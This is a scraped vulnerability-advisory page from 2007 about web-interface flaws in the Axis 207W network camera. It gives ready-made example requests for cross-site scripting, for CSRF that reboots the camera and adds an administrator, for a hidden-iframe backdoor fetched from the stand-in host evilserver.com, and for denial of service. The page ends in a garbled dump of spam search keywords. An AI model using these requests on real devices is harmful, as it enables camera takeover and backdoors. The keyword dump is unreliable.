exploits , vulnerabilities , articles , Axis Communications 207W Network Camera Web Interface Vulnerabilities

Title	Axis Communications 207W Network Camera Web Interface Vulnerabilities
Published	2007-09-14-12:00AM
Updated	2007-09-17-06:30PM
Class	Unknown
CVE
Remote	Yes
Local	No
Credit	Discovery is credited to Seth Fogie.
Vulnerable	Axis Communications 207W Network Camera 0
Not Vulnerable
Code	The following examples were provided:Cross-site scripting: http://www.example.com/incl/image_incl.shtml?camNo=</script><script>alert(String.fromCharCode(88,83,83))</script>Cross-site request forgery: 1. Reboot the camera - http://www.example.com/axis-cgi/admin/restart.cgi 2. Add a new administrator - http://www.example.com/axis-cgi/admin/pwdgrp.cgi?action=add&user=owner1&grp=axuser&sgrp=axview:axoper:axadmin&pwd=owner1&comment=WebUser&return_page=/admin/users_set.sh +tml%3Fpageclose%3D1 3. Root the camera/add a backdoor - http://www.example.com/admin/restartMessage.shtml?server=<iframe%20style=visibility:hidden%20src=http://www.evilserver.com/wifi/axisbd.php><iframe src=http://www.evilserver.com/wifi/axisrb.htm><!â??Denial of service: http://www.example.com/axis-cgi/buffer/command.cgi?do=start&buffername=<unique buffer name>
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-17 Mozilla Firefox and SeaMonkey Theora Video Library Remote Integer Overflow Vulnerability
2009-12-17 Mozilla Firefox and Sea Monkey Insecure Protocol Location Bar Spoofing Vulnerability
2009-12-17 Mozilla Firefox and Sea Monkey Content Injection Spoofing Vulnerability
2009-12-17 Mozilla Firefox/SeaMonkey GeckoActiveXObject Exception Message COM Object Enumeration Vulnerability
2009-12-16 ZABBIX Denial Of Service and SQL Injection Vulnerabilities
2009-12-16 IBM WebSphere Application Server JNDI Remote Information Disclosure Vulnerability
2009-12-16 Horde Application Framework Administration Interface Cross-Site Scripting Vulnerability
2009-12-16 Mozilla Firefox and SeaMonkey MFSA 2009-65 through -71 Multiple Vulnerabilities
2009-12-16 Merkaartor Insecure Temporary File Creation Vulnerability
2009-12-15 TYPO3 Watchdog (aba_watchdog) Unspecified Information Disclosure Vulnerability

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 08:40:29 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
sex galarr maxcpm.inf Rambasexi www.86el.c all sex vi alexa.xuew smf 1.1.4 http://www kuwar.cn maxcpm.inf modernbill Cistina I agree wi WWW.DEWASA www.gfjdji virtual se Biya2 freebsd ex rs gallery news for c uthappam bollywod worldseks. www.12cr1m Hind ...Ftmp/t bbs.mk169. www.mysekx modernbill www.lexsen desi sex v www.xxl.cn /search/ex yahosex.co www.newxiw news for c www.258yy. php-nuke 2 www.gzsang SecureFX www.liaoti Www.Comsex www.animal CMS is Fre icamtech.c Ihre Web-S nayan+thar www.tjpeix php-nuke 2 gwar